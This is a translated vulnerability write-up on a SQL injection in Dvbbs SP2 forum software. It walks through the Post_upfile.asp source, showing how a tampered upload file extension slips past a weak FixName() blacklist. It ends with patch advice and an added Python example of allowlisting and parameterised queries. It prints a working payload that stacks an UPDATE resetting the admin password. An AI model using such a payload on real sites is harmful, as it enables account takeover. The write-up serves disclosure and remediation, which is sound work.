Dvbbs SP2 Upload Vulnerability Reproduction ---- The Myth of Dvbbs SP2. Source: TNT-B Security Team. This article is about DVBBS (the "Dvbbs" forum software)! Original text:
http://www.dvbbs.net/tnt-b/dvbbs.txt
It may have been deleted by now! Hoho. A while ago I heard that the Dvbbs upload had turned up a bug yet again, and some people actually claimed the bug was in UPLOAD.INC. I read that code carefully N times and can say definitively that Upload.inc cannot be exploited. Today I happened to look at the official Dvbbs site and noticed the upload in the personal-profile editor, but I did not get anywhere with it; upload.asp and post_upload.asp both use UPLOAD.INC, which proves that file is absolutely fine, so the problem must be in Post_upfile.asp. Open that file and read it once more! One look:
    If upload_ViewType <> 999 And F_Type = 1 Then
        Dvbbs.Execute("insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.BoardID & "," & Dvbbs.UserID & ",'" & Dvbbs.MemberName & "','" & Replace(Rename, "|", "") & "','" & F_ViewName & "','" & Replace(FileExt, ".", "") & "'," & F_Type & "," & FileSize & ",4)")
    Else
        Dvbbs.Execute("insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.BoardID & "," & Dvbbs.UserID & ",'" & Dvbbs.MemberName & "','" & Replace(Rename, "|", "") & "','" & Replace(FileExt, ".", "") & "'," & F_Type & "," & FileSize & ",4)")
    End If
There is a SQL statement. Could the legendary "inject instead of upload" be here? Let's look at each variable that goes into it one by one. Dvbbs.BoardID, Dvbbs.UserID, Dvbbs.MemberName and F_ViewName are certainly no problem; the remaining few we will look at next. Where do these variables come from, and how are they obtained? First, Replace(Rename, "|", "") removes the "|" from Rename. Let's see how Rename is built: Rename = CreatePath & FileName & "|". It is CreatePath and FileName joined together with a "|" appended, and that "|" is filtered back out, so we have to look at CreatePath and FileName. FileName is built from File_Name and FileExt:
    File_Name = CreateName()
    FileName = File_Name & "." & FileExt
and CreateName() is:
    Private Function CreateName()
        Dim RanNum
        Randomize
        RanNum = Int(999 * Rnd)
        CreateName = Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & RanNum
    End Function
Obviously File_Name is generated from the current date and time plus a random number, so there is no way to use it, and suspicion falls on FileExt . . . . . Will the legend really show up here? Don't panic yet; first let's look at the other places. CreatePath looks like this:
    Private Function CreatePath()
        Dim objFSO, FsoFolder, UploadPath
        UploadPath = Year(Now) & "-" & Month(Now)   ' upload folder created per month, format: 2003-8
        On Error Resume Next
        Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
        If objFSO.FolderExists(Server.MapPath(CheckFolder & UploadPath)) = False Then
            objFSO.CreateFolder Server.MapPath(CheckFolder & UploadPath)
        End If
        If Err.Number = 0 Then
            CreatePath = UploadPath & "/"
        Else
            CreatePath = ""
        End If
        Set objFSO = Nothing
    End Function
CreatePath is likewise just UploadPath, generated with the FSO, giving something like UploadFile/2004-11, so there is nothing to use there either. Now look at the other variable, Replace(FileExt, ".", ""): it is exactly the FileExt mentioned earlier. Heh, see, it's him. Let's trace where it comes from:
    Set File = Upload.File(FormName)   ' create the file object
    FileExt = FixName(File.FileExt)
Here File.FileExt appears. Isn't that the extension we submit ourselves? Anyone who has played around on the web knows that capturing the request and changing the extension is perfectly normal. It looks like there is a way in; at least this spot can be used. But FileExt = FixName(File.FileExt) also runs it through FixName, so let's see what that function does:
    Function FixName(UpFileExt)
        If IsEmpty(UpFileExt) Then Exit Function
        FixName = LCase(UpFileExt)
        FixName = Replace(FixName, Chr(0), "")
        FixName = Replace(FixName, ".", "")      ' replaces "." with empty; this is why the SP2 upload cannot be abused the old way
        FixName = Replace(FixName, "asp", "")    ' strips asp
        FixName = Replace(FixName, "asa", "")    ' strips asa
        FixName = Replace(FixName, "aspx", "")   ' strips aspx
        FixName = Replace(FixName, "cer", "")    ' strips cer
        FixName = Replace(FixName, "cdx", "")    ' strips cdx
        FixName = Replace(FixName, "htr", "")    ' strips htr
    End Function
Haha, it only filters a few specific strings. Quotes, semicolons, commas and "--" are not filtered at all, so they pass through unimpeded. Then we can construct a statement; let's look at his SQL statement again:
    insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.BoardID & "," & Dvbbs.UserID & ",'" & Dvbbs.MemberName & "','" & Replace(Rename, "|", "") & "','" & F_ViewName & "','" & Replace(FileExt, ".", "") & "'," & F_Type & "," & FileSize & ",4)
The part right after values, " & Dvbbs.BoardID & "," & Dvbbs.UserID & ",'" & Dvbbs.MemberName & "', is all normal.
Once we change FileExt, Rename changes as well, so the tail & Replace(FileExt, ".", "") & is actually usable too, as long as we construct the Rename that comes before it. Let's see how Rename is formed:
    Rename = CreatePath & FileName & "|"
    File_Name = CreateName()
    FileName = File_Name & "." & FileExt
CreatePath is a normal string value and cannot be used; File_Name is also a normal value; there is one "." in the middle, which does not count; and the "|" he filters out for us, so it does not count either. Suppose his statement is:
    insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (1, 1, 'user', 'uploadfile/2004-11/2324128374912.jpg', 'User', 'jpg', 1, 1000, 4)
This is a normal statement. The spot we can use is the jpg: it is the extension of our local file, which we can change in the captured request. So we construct the jpg into a complete SQL statement, for example replacing jpg with:
    jpg','User','jpg',1,1000,4);UPDATE Dv_Admin SET UserPassword='123' WHERE UserName='admin'--jpg
(Note: his F_Type is used to detect the file type. If it is 1, the first SQL statement above is executed; otherwise the other one is. The specific code is here:
    F_Type = CheckFileType(FileExt)
and the CheckFileType function is:
    Private Function CheckFileType(FileExt)
        Dim UpFileType
        Dim FilePic, FileVedio, FileSoft, FileFlash, FileMusic
        FileExt = LCase(Replace(FileExt, ".", ""))
        Select Case LCase(FileExt)
            Case "gif", "jpg", "jpeg", "png", "bmp", "tif", "iff"
                CheckFileType = 1
            Case "swf", "swi"
                CheckFileType = 2
            Case "mid", "wav", "mp3", "rmi", "cda"
                CheckFileType = 3
            Case "avi", "mpg", "mpeg", "ra", "ram", "wov", "asf"
                CheckFileType = 0
        End Select
    End Function
This also uses the FileExt variable, that is, our extension with every "." removed, which is then matched against the list. So our statement ends up being routed into the second INSERT, because the first statement and the second statement are different!) The UserPassword in Dv_Admin is then changed to 123. With the Access version it seems a bit harder: the semicolon cannot execute a second statement, there is no WHERE condition to guess against, and VALUES cannot be filled in with a SELECT for other values; only the result of an entire SELECT can be added as a record, and there is no way to get a separate value into VALUES. If anyone can construct that perfect syntax, please teach me; my SQL level is not that high, and for the Access version I have no complete approach for now. That ends the article. The most important point is that every parameter put into a SQL statement must be strictly checked. The patch for this spot is to filter in the FixName() function; if you cannot patch yet, turn off the upload function first and wait for the patch! :)
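As an added example (not Dvbbs code), the SP2 FixName() blacklist from post_upfile.asp is ported to Python next to the fix the article calls for: an allowlist check on the extension plus a parameterised INSERT. It assumes sqlite3 standing in for the Access/SQL Server backend, and the dv_upFile column list and the ALLOWED_EXT set are taken from the INSERT and CheckFileType() cases shown above.

```python
import sqlite3

# Extensions post_upfile.asp's CheckFileType() knows; anything else is refused.
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png", "bmp", "tif", "iff", "swf", "swi",
               "mid", "wav", "mp3", "rmi", "cda", "avi", "mpg", "mpeg", "ra",
               "ram", "asf"}

def fix_name(ext):
    """Port of the SP2 FixName() blacklist: strips a few tokens but leaves
    quotes, semicolons and '--' untouched, so the value is still injectable."""
    out = ext.lower().replace("\x00", "").replace(".", "")
    for token in ("asp", "asa", "aspx", "cer", "cdx", "htr"):
        out = out.replace(token, "")
    return out

def check_ext(ext):
    """Allowlist replacement: the extension must be one known value, exactly."""
    ext = ext.lower().lstrip(".")
    if ext not in ALLOWED_EXT:
        raise ValueError("rejected extension: %r" % ext)
    return ext

def insert_upload(conn, board_id, user_id, member, path, ext, size):
    """Parameterised form of the dv_upFile INSERT; data never touches the SQL text."""
    ext = check_ext(ext)
    conn.execute(
        "INSERT INTO dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename,"
        " F_FileType, F_Type, F_FileSize, F_Flag) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        (board_id, user_id, member, path + "." + ext, ext, 1, size, 4))
    conn.commit()

def demo():
    """Returns (blacklist lets quote and -- through, allowlist rejects it, rows stored)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dv_upFile (F_BoardID, F_UserID, F_Username,"
                 " F_Filename, F_FileType, F_Type, F_FileSize, F_Flag)")
    # constructed sample: an "extension" carrying SQL metacharacters
    hostile = "jpg',x);--"
    survives = "'" in fix_name(hostile) and "--" in fix_name(hostile)
    insert_upload(conn, 1, 1, "user", "uploadfile/2004-11/2324128374912", "JPG", 1000)
    try:
        insert_upload(conn, 1, 1, "user", "uploadfile/2004-11/x", hostile, 1000)
        rejected = False
    except ValueError:
        rejected = True
    rows = conn.execute("SELECT COUNT(*) FROM dv_upFile").fetchone()[0]
    return survives, rejected, rows
```

demo() returns (True, True, 1): the blacklist passes the metacharacters straight through, while the allowlist refuses the value before any SQL is built and only the legitimate row is stored.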